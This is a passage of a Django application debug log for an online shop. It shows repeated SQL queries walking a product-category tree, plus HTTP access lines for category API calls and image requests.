"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2020-01-03 16:36:50,835 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2020-01-03 16:36:50,841 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2020-01-03 16:36:50,846 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2020-01-03 16:36:50,857 utils 27361 140408443102976 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2020-01-03 16:36:50,862 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2020-01-03 16:36:50,866 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2020-01-03 16:36:50,870 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2020-01-03 16:36:50,875 utils 27361 140408542058240 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 15; args=(15,) DEBUG 2020-01-03 16:36:50,876 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2020-01-03 16:36:50,887 utils 27361 140408542058240 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-03 16:36:50,888 utils 27361 140408443102976 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2020-01-03 16:36:50,892 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-03 16:36:50,898 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2020-01-03 16:36:50,905 utils 27361 140408443102976 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [03/Jan/2020 16:36:50] "GET /api/v1/categories/15 HTTP/1.0" 200 223 [03/Jan/2020 16:36:50] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [03/Jan/2020 16:36:50] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [03/Jan/2020 16:36:51] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [03/Jan/2020 16:36:51] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [03/Jan/2020 16:36:51] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [03/Jan/2020 16:36:51] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [03/Jan/2020 16:36:51] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [03/Jan/2020 16:36:51] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [03/Jan/2020 16:36:52] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 DEBUG 2020-01-03 16:37:10,117 utils 27361 140408453592832 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2020-01-03 16:37:10,124 utils 27361 140408443102976 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 9; args=(9,) DEBUG 2020-01-03 16:37:10,128 utils 27361 140408453592832 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2020-01-03 16:37:10,132 utils 27361 140408443102976 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-03 16:37:10,134 utils 27361 140408453592832 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2020-01-03 16:37:10,137 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [03/Jan/2020 16:37:10] "GET /api/v1/categories/9 HTTP/1.0" 200 500 DEBUG 2020-01-03 16:37:10,141 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2020-01-03 16:37:10,143 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2020-01-03 16:37:10,146 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2020-01-03 16:37:10,150 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-03 16:37:10,154 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2020-01-03 16:37:10,157 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2020-01-03 16:37:10,160 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2020-01-03 16:37:10,163 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2020-01-03 16:37:10,166 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2020-01-03 16:37:10,169 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2020-01-03 16:37:10,174 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2020-01-03 16:37:10,177 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2020-01-03 16:37:10,180 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2020-01-03 16:37:10,183 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2020-01-03 16:37:10,186 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2020-01-03 16:37:10,191 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2020-01-03 16:37:10,195 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2020-01-03 16:37:10,198 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2020-01-03 16:37:10,201 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2020-01-03 16:37:10,204 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2020-01-03 16:37:10,207 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2020-01-03 16:37:10,212 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2020-01-03 16:37:10,215 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2020-01-03 16:37:10,218 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2020-01-03 16:37:10,221 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2020-01-03 16:37:10,224 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2020-01-03 16:37:10,229 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2020-01-03 16:37:10,232 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2020-01-03 16:37:10,235 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2020-01-03 16:37:10,239 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2020-01-03 16:37:10,242 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2020-01-03 16:37:10,246 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2020-01-03 16:37:10,250 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2020-01-03 16:37:10,253 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2020-01-03 16:37:10,256 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2020-01-03 16:37:10,261 utils 27361 140408453592832 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2020-01-03 16:37:10,264 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2020-01-03 16:37:10,268 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2020-01-03 16:37:10,271 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2020-01-03 16:37:10,274 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-03 16:37:10,278 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2020-01-03 16:37:10,281 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [03/Jan/2020 16:37:10] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2020-01-03 16:37:30,620 utils 27361 140408453592832 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2020-01-03 16:37:30,630 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2020-01-03 16:37:30,636 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 